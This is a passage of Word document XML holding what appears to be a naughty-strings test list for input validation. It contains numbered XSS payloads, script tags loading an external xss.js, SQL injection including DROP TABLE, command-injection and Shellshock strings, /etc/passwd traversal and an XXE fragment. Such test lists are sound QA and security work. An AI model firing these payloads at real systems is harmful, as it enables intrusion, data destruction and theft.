        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x83javascript:javascript:alert(91)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x04javascript:javascript:alert(92)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x01javascript:javascript:alert(93)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x08javascript:javascript:alert(94)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x84javascript:javascript:alert(95)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x86javascript:javascript:alert(96)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE3\x80\x80javascript:javascript:alert(97)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x12javascript:javascript:alert(98)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x0Djavascript:javascript:alert(99)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x0Ajavascript:javascript:alert(100)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x0Cjavascript:javascript:alert(101)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x15javascript:javascript:alert(102)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\xA8javascript:javascript:alert(103)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x16javascript:javascript:alert(104)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x02javascript:javascript:alert(105)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x1Bjavascript:javascript:alert(106)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x06javascript:javascript:alert(107)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\xA9javascript:javascript:alert(108)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x85javascript:javascript:alert(109)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x1Ejavascript:javascript:alert(110)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x81\x9Fjavascript:javascript:alert(111)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x1Cjavascript:javascript:alert(112)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="javascript\x00:javascript:alert(113)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="javascript\x3A:javascript:alert(114)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="javascript\x09:javascript:alert(115)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="javascript\x0D:javascript:alert(116)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="javascript\x0A:javascript:alert(117)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`"'&gt;&lt;img src=xxx:x \x0Aonerror=javascript:alert(118)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`"'&gt;&lt;img src=xxx:x \x22onerror=javascript:alert(119)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`"'&gt;&lt;img src=xxx:x \x0Bonerror=javascript:alert(120)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`"'&gt;&lt;img src=xxx:x \x0Donerror=javascript:alert(121)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`"'&gt;&lt;img src=xxx:x \x2Fonerror=javascript:alert(122)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`"'&gt;&lt;img src=xxx:x \x09onerror=javascript:alert(123)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`"'&gt;&lt;img src=xxx:x \x0Conerror=javascript:alert(124)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`"'&gt;&lt;img src=xxx:x \x00onerror=javascript:alert(125)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`"'&gt;&lt;img src=xxx:x \x27onerror=javascript:alert(126)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`"'&gt;&lt;img src=xxx:x \x20onerror=javascript:alert(127)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x3Bjavascript:alert(128)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x0Djavascript:alert(129)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xEF\xBB\xBFjavascript:alert(130)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x81javascript:alert(131)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x84javascript:alert(132)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE3\x80\x80javascript:alert(133)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x09javascript:alert(134)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x89javascript:alert(135)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x85javascript:alert(136)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x88javascript:alert(137)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x00javascript:alert(138)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\xA8javascript:alert(139)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x8Ajavascript:alert(140)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE1\x9A\x80javascript:alert(141)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x0Cjavascript:alert(142)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x2Bjavascript:alert(143)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xF0\x90\x96\x9Ajavascript:alert(144)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;-javascript:alert(145)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x0Ajavascript:alert(146)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\xAFjavascript:alert(147)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x7Ejavascript:alert(148)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x87javascript:alert(149)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x81\x9Fjavascript:alert(150)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\xA9javascript:alert(151)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xC2\x85javascript:alert(152)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xEF\xBF\xAEjavascript:alert(153)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x83javascript:alert(154)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x8Bjavascript:alert(155)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xEF\xBF\xBEjavascript:alert(156)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x80javascript:alert(157)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x21javascript:alert(158)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x82javascript:alert(159)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE2\x80\x86javascript:alert(160)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xE1\xA0\x8Ejavascript:alert(161)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x0Bjavascript:alert(162)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\x20javascript:alert(163)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"`'&gt;&lt;script&gt;\xC2\xA0javascript:alert(164)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img \x00src=x onerror="alert(165)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img \x47src=x onerror="javascript:alert(166)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img \x11src=x onerror="javascript:alert(167)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img \x12src=x onerror="javascript:alert(168)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img\x47src=x onerror="javascript:alert(169)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img\x10src=x onerror="javascript:alert(170)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img\x13src=x onerror="javascript:alert(171)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img\x32src=x onerror="javascript:alert(172)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img\x47src=x onerror="javascript:alert(173)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img\x11src=x onerror="javascript:alert(174)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img \x47src=x onerror="javascript:alert(175)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img \x34src=x onerror="javascript:alert(176)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img \x39src=x onerror="javascript:alert(177)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img \x00src=x onerror="javascript:alert(178)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src\x09=x onerror="javascript:alert(179)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src\x10=x onerror="javascript:alert(180)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src\x13=x onerror="javascript:alert(181)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src\x32=x onerror="javascript:alert(182)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src\x12=x onerror="javascript:alert(183)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src\x11=x onerror="javascript:alert(184)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src\x00=x onerror="javascript:alert(185)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src\x47=x onerror="javascript:alert(186)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x\x09onerror="javascript:alert(187)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x\x10onerror="javascript:alert(188)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x\x11onerror="javascript:alert(189)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x\x12onerror="javascript:alert(190)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x\x13onerror="javascript:alert(191)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img[a][b][c]src[d]=x[e]onerror=[f]"alert(192)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x onerror=\x09"javascript:alert(193)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x onerror=\x10"javascript:alert(194)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x onerror=\x11"javascript:alert(195)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x onerror=\x12"javascript:alert(196)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x onerror=\x32"javascript:alert(197)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src=x onerror=\x00"javascript:alert(198)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href=java&amp;#1&amp;#2&amp;#3&amp;#4&amp;#5&amp;#6&amp;#7&amp;#8&amp;#11&amp;#12script:javascript:alert(199)&gt;XXX&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src="x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;script&gt;javascript:alert(200)&lt;/script&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;img src onerror /" '"= alt=javascript:alert(201)//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href=http://foo.bar/#x=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">y&gt;&lt;/a&gt;&lt;img alt="</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;&lt;img src=x:x onerror=javascript:alert(203)&gt;&lt;/a&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;IMG """&gt;&lt;SCRIPT&gt;alert(“206”)&lt;/SCRIPT&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC= onmouseover="alert(‘209’)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">perl -e ‘print "&lt;IMG SRC=java\0script:alert("218")&gt;";’ &gt; out</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;SCRIPT/XSS SRC=“http://ha.ckers.org/xss.js”&gt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;SCRIPT/SRC=“http://ha.ckers.org/xss.js”&gt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;&lt;SCRIPT&gt;alert(“221”);//&lt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC=“javascript:alert(‘222’)”</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">";alert(‘223’);//</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Copy me</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> Scroll over me </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">http://a/%%30%30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;/textarea&gt;&lt;script&gt;alert(225)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1;DROP TABLE users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1'; DROP TABLE users– 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">' OR 1=1 – 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">' OR ‘1’='1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">'; EXEC sp_MSForEachTable 'DROP TABLE ?'; –</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">_</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">–</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">–version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">–help</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">$USER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">/dev/null; touch /tmp/blns.fail ; echo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">touch /tmp/blns.fail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">$(touch /tmp/blns.fail)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">@{[system “touch /tmp/blns.fail”]}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">eval("puts ‘hello world’")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">System("ls -al /")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -al /</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Kernel.exec("ls -al /")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Kernel.exit(1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">%x('ls -al /')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">]&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&amp;xxe;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">$HOME</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">$ENV{‘HOME’}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">%d</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">%s%s%s%s%s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">{0}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">%*.*s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">%@</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">%n</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">File:///</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">../../../../../../../../../../../etc/passwd%00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">../../../../../../../../../../../etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">() { 0; }; touch /tmp/blns.shellshock1.fail;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">() { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">; } &gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[$($())] { touch /tmp/blns.shellshock2.fail; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;&lt;&lt; %s(un='%s') = %u</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">+++ATH0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">CON</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">PRN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">AUX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">CLOCK$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">NUL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">A:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ZZ:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">COM1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">LPT1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">LPT2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">LPT3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">COM2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">COM3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">COM4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">DCC SEND STARTKEYLOGGER 0 0 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Scunthorpe General Hospital</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
